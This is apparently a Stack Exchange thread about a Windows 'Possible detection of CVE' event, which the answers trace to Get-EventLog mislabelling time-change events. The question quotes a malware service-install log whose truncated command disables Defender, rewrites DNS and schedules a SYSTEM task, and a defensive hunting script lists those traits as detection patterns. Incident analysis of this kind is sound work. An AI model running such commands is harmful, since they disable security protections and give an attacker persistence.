From the Windows event log, was the exploit blocked? Can I get the CVE number from the event log so I can know the specific KB number?

39536 Apr 13 08:31 Information Microsoft-Windows-Kernel-General 
1 Possible detection of CVE: 2020-04-13T01:31:16.580703600Z
Additional Information: 2020-04-13T01:31:16.580796000Z
This Event is generated when an attempt to exploit a known vulnerability 2020-04-13T01:31:16.580703600Z) is detected.
This Event is raised by a User mode process.

I also got this malware log:

Apr 13 08:29 Information Service Control Manager 1073748869 A service was installed in the system.
Service Name:  SYYHQSMMFDSEFEVOTKNH
Service File Name:  %COMSPEC% /C "cmd /c powershell -c
Set-MpPreference -DisableRealtimeMonitoring $true;(get-wmiobject -class win32_networkadapterconfiguration -filter ipenabled=true).
SetDNSServerSearchOrder(@('8.8.8.8','9.9.9.9'))&powershell -c attrib -R C:\WINDOWS\system32\drivers\etc\hosts;$rh=-join([char[]](Get-Random -Count (6+(Get-Random)%6)(65..90+97..122)));$cmd='schtasks /create /ru system /sc MINUTE /mo 120 /tn Rtsa1 /F /tr \"powershell -c ''*awcna*

I have already patched the machine with MS17-010 and haven't found a successful logon in the log. So confusing..

Giacomo1968
slowmotion
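The service-install log quoted in the question is a Service Control Manager Event ID 7045 record. The following hunt is an added example, not code from the question or either answer: it reads 7045 events from the System log, pulls the ImagePath from each event's XML, and flags paths containing the traits seen in the question's entry. It assumes an English Windows host and uses the 7045 EventData field names (ServiceName, ImagePath, AccountName); the pattern list and the sample string are constructed for this example.

```powershell
# Added example (not from the page): hunt System log 7045 records for service
# image paths that look like the one in the question. Assumes the 7045 EventData
# field names ServiceName, ImagePath and AccountName.
$Patterns = @(
    'powershell',                  # a shell registered as the service binary
    '%COMSPEC%',                   # cmd.exe indirection
    'Set-MpPreference',            # Defender configuration changed by a service
    'DisableRealtimeMonitoring',   # Defender real-time protection switched off
    'SetDNSServerSearchOrder',     # DNS resolvers rewritten via WMI
    'schtasks\s+/create'           # persistence through a scheduled task
)

function Test-SuspiciousServiceInstall {
    param([string]$ImagePath)
    # Returns every pattern that matches; an empty array means nothing odd.
    $hits = foreach ($p in $Patterns) { if ($ImagePath -match $p) { $p } }
    return @($hits)
}

function Get-ServiceInstallEvents {
    param([int]$MaxEvents = 200)
    Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # EventData holds the raw fields the message template is filled from.
            $x = [xml]$_.ToXml()
            $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            [pscustomobject]@{
                TimeCreated = $_.TimeCreated
                ServiceName = $d['ServiceName']
                ImagePath   = $d['ImagePath']
                AccountName = $d['AccountName']
                Indicators  = (Test-SuspiciousServiceInstall $d['ImagePath']) -join ', '
            }
        } | Where-Object { $_.Indicators }
}

# Constructed sample modelled on the question's 7045 entry, so the matcher can
# be exercised without a live record.
$sample = '%COMSPEC% /C "cmd /c powershell -c Set-MpPreference -DisableRealtimeMonitoring $true; schtasks /create /ru system /sc MINUTE /mo 120"'
Test-SuspiciousServiceInstall $sample

# On a live host:
# Get-ServiceInstallEvents | Format-Table -AutoSize
```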

2 Answers


I just posted this on a Microsoft forum question, and figured I'd share here (I like SE much better than MS forums :-P)

I just ran into this as well. One thing I did notice when trying to get more info is that there seems to be a discrepancy between what PowerShell is reporting and what the Event Viewer GUI is reporting. For Event 1 Category 5, I'm getting:

  • PowerShell: Possible detection of CVE: , Additional Information: . This Event is generated when an attempt to exploit a known vulnerability () is detected. This Event is raised by a User mode process.
  • GUI: The system time has changed to ‎ from ‎

There is an associated Event 24 Category 11 that is showing:

  • PowerShell: The description for Event ID '24' in Source 'Microsoft-Windows-Kernel-General' cannot be found. The local computer may not have the necessary registry information or message DLL files to display the message, or you may not have permission to access them. The following information is part of the event:

  • GUI: The time zone information was refreshed with exit reason . Current time zone bias is .

Given the data that was passed, it looks to me like the GUI is right (time adjustment), and PowerShell is getting the wrong descriptions (CVE detection) for the events. The first event is passing datetimes that look like before and after datetimes, and the second event's second parameter is -600, which I believe correlates to the timezone I'm in (AEST, GMT+10, so 600 minute adjustment).

DarkMoon

To expand on @DarkMoon's answer a bit, I saw the same "Possible detection of CVE" message text in PowerShell's Get-EventLog output. For that event, the message text from Get-EventLog disagrees with at least three other methods of querying the Windows Event Log:

  • Windows Event Viewer GUI.
  • PowerShell's Get-WinEvent.
  • Windows' wevtutil command line utility.

All of those methods have the message text starting "The system time has changed to". Furthermore, PID 4 on my system refers to the System process, which may not be immune to being hacked, but it seems less likely than some other processes. I consider all this additional evidence that PowerShell's Get-EventLog is not reporting the correct message text. See examples below:

Windows Event Viewer: [GUI screenshot showing the event with the system time message]

wevtutil

PS C:\> wevtutil qe System /rd:true /c:10 /f:text
...
Event[6]:
  Log Name: System
  Source: Microsoft-Windows-Kernel-General
  Date: 2023-03-09T08:41:45.5000000Z
  Event ID: 1
  Task: N/A
  Level: Information
  Opcode: Info
  Keyword: Time
  User: N/A
  User Name: N/A
  Computer: atacama
  Description:
The system time has changed to ‎2023‎-‎03‎-‎09T13:41:45.500000000Z from ‎2023‎-‎03‎-‎09T04:12:41.415750200Z.

Change Reason: System time synchronized with the hardware clock. Process: '' (PID 4). ...

Get-WinEvent

PS C:\> Get-WinEvent -MaxEvents 1 -FilterHashtable @{ LogName = 'System'; Id = 1; ProviderName = 'Microsoft-Windows-Kernel-General' } | Format-List

TimeCreated  : 3/9/2023 8:41:45 AM
ProviderName : Microsoft-Windows-Kernel-General
Id           : 1
Message      : The system time has changed to ‎2023‎-‎03‎-‎09T13:41:45.500000000Z from ‎2023‎-‎03‎-‎09T04:12:41.415750200Z.

               Change Reason: System time synchronized with the hardware clock.
               Process: '' (PID 4).

Get-EventLog

PS C:\> Get-EventLog System -Source Microsoft-Windows-Kernel-General -InstanceId 1 -Newest 1 | Format-List

Index              : 97462
EntryType          : Information
InstanceId         : 1
Message            : Possible detection of CVE: 2023-03-09T13:41:45.5000000Z
                     Additional Information: 2023-03-09T04:12:41.4157502Z

                     This Event is generated when an attempt to exploit a
                     known vulnerability (2023-03-09T13:41:45.5000000Z) is
                     detected.
                     This Event is raised by a User mode process.
Category           : (5)
CategoryNumber     : 5
ReplacementStrings : {2023-03-09T13:41:45.5000000Z, 2023-03-09T04:12:41.4157502Z, 2, ...}
Source             : Microsoft-Windows-Kernel-General
TimeGenerated      : 3/9/2023 8:41:45 AM
TimeWritten        : 3/9/2023 8:41:45 AM
UserName           :
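To turn the cross-check in this answer into something repeatable, the script below is an added example (not code from either answer): for the newest Kernel-General Event ID 1 record it dumps the raw EventData fields from the event XML (the values both cmdlets substitute into a message template), then fetches the same record through the legacy Get-EventLog and reports whether the two rendered messages agree. It assumes a Windows host with at least one such event in the System log, and that Get-EventLog's Index lines up with Get-WinEvent's RecordId; Get-EventLog is absent in PowerShell 7+, so that part is skipped when the cmdlet is missing.

```powershell
# Added example (not from the page): compare how Get-WinEvent and Get-EventLog
# render the same Microsoft-Windows-Kernel-General Event ID 1 record.
function Get-KernelTimeChangeEvent {
    $ev = Get-WinEvent -MaxEvents 1 -ErrorAction SilentlyContinue -FilterHashtable @{
        LogName = 'System'; Id = 1; ProviderName = 'Microsoft-Windows-Kernel-General'
    }
    if (-not $ev) { return $null }

    # EventData is the ground truth: each Data element is one replacement
    # string. Names are read from the XML rather than assumed.
    $xml  = [xml]$ev.ToXml()
    $data = [ordered]@{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

    # Legacy cmdlet, if present. Assumption: its Index equals RecordId.
    $legacyMsg = $null
    if (Get-Command Get-EventLog -ErrorAction SilentlyContinue) {
        $legacyMsg = (Get-EventLog -LogName System -Index $ev.RecordId `
                      -ErrorAction SilentlyContinue).Message
    }

    $winMsg = [string]$ev.Message
    [pscustomobject]@{
        RecordId            = $ev.RecordId
        TimeCreated         = $ev.TimeCreated
        EventData           = $data
        WinEventMessage     = $winMsg
        LegacyMessage       = $legacyMsg
        LooksLikeTimeChange = $winMsg -like 'The system time has changed*'
        MessagesAgree       = ($null -ne $legacyMsg) -and
                              (([string]$legacyMsg).Trim() -eq $winMsg.Trim())
    }
}

Get-KernelTimeChangeEvent | Format-List
```

If MessagesAgree is false while LooksLikeTimeChange is true and EventData holds two timestamps and a small reason code, the record is the time-change event described in this answer, whatever text the legacy cmdlet wrapped around it.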